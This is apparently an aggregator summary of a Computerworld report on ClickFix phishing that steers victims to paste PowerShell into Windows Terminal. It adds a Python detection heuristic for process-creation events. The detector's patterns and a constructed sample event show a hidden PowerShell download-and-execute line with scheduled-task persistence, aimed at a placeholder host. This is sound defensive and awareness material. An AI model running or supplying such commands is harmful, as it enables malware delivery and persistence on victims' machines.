
"Rather than asking potential victims to copy and paste a (malicious) command into the Run dialog, launched by hitting the Windows button plus the letter R, they are being told to use the Windows + X → I shortcut to launch Windows Terminal (wt.exe) directly. Once the terminal is opened, victims are prompted to paste in malicious PowerShell commands delivered through fake CAPTCHA pages, troubleshooting prompts, or verification-style lures designed to appear routine and benign."
"Going this route evades defenses looking for unusual run commands, and it bypasses security awareness training that tells employees not to do anything that invokes the Run command. The decoded PowerShell script then downloads a legitimate but renamed 7-Zip binary and saves it with a randomized file name, along with a zipped payload. The renamed archive utility extracts and runs the malware, which executes a multi-stage attack chain."
Threat actors are evolving ClickFix phishing tactics by directing victims to use Windows Terminal instead of the Run dialog to execute malicious commands. This approach circumvents security defenses designed to detect suspicious Run command activity and bypasses employee training warning against such actions. Once Windows Terminal opens, victims paste malicious PowerShell commands from fake CAPTCHA pages or troubleshooting prompts. The attack chains include multiple stages: decoding hex commands, downloading renamed legitimate utilities like 7-Zip, extracting malware payloads, establishing persistence through scheduled tasks, evading Microsoft Defender, and exfiltrating sensitive data. Alternative attack paths use hex-encoded, XOR-compressed commands to download batch files. Security leaders must educate employees about this emerging tactic.
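As an added example (not code from the article or from Computerworld), the following Python check runs over constructed process-creation events and flags a PowerShell child of Windows Terminal whose command line shows several traits of the chain described above; wt.exe comes from the article, while WindowsTerminal.exe as a parent image, the trait regexes and the sample events are assumptions.

```python
import re
from dataclasses import dataclass

# Parent images for the Win+X -> I variant: wt.exe is named in the article;
# WindowsTerminal.exe (the host it launches) is an assumption.
TERMINAL_PARENTS = {"wt.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}

# Traits of the described chain: download, hex/base64 decoding, extraction with a
# (renamed) 7-Zip, scheduled-task persistence, Defender tampering. Illustrative only.
TRAITS = [
    ("download", re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", re.I)),
    ("decode", re.compile(r"frombase64string|-encodedcommand|\s-e(nc)?\s|(0x[0-9a-f]{2}){4}", re.I)),
    ("extract", re.compile(r"\b7z\b|\.7z\b|expand-archive", re.I)),
    ("persist", re.compile(r"schtasks|register-scheduledtask", re.I)),
    ("defender", re.compile(r"set-mppreference|add-mppreference", re.I)),
]

@dataclass
class ProcessEvent:
    parent_image: str  # full path of the parent process
    image: str         # full path of the new process
    command_line: str

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Trait labels hit by a shell spawned from Windows Terminal; [] otherwise."""
    if basename(ev.parent_image) not in TERMINAL_PARENTS or basename(ev.image) not in SHELLS:
        return []
    return [label for label, rx in TRAITS if rx.search(ev.command_line)]

def alerts(events, min_traits=2):
    """Events whose command line hits at least min_traits traits, paired with the hits."""
    scored = [(ev, classify(ev)) for ev in events]
    return [(ev, hits) for ev, hits in scored if len(hits) >= min_traits]

# Constructed sample events (not real telemetry). The first mimics the article's chain:
# fetch a renamed 7-Zip plus a zipped payload, extract it, register a scheduled task.
TERM = r"C:\Program Files\WindowsApps\Terminal\WindowsTerminal.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = [
    ProcessEvent(TERM, PS, r'powershell -nop -w hidden -c "iwr http://placeholder.invalid/a '
                           r'-OutFile $env:TEMP\q7k2.exe; & $env:TEMP\q7k2.exe x $env:TEMP\p.7z; schtasks /create ..."'),
    ProcessEvent(TERM, PS, "powershell Get-ChildItem C:\\Users"),  # benign admin use
    ProcessEvent(r"C:\Windows\explorer.exe", PS, "powershell -EncodedCommand AAAA"),  # wrong parent
]
```

Requiring two or more traits keeps ordinary interactive use of the terminal (second sample) out of the alert list while the article's download-extract-persist sequence (first sample) is flagged.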
#clickfix-phishing #windows-terminal-exploitation #malware-delivery #powershell-attacks #security-awareness-training
Read at Computerworld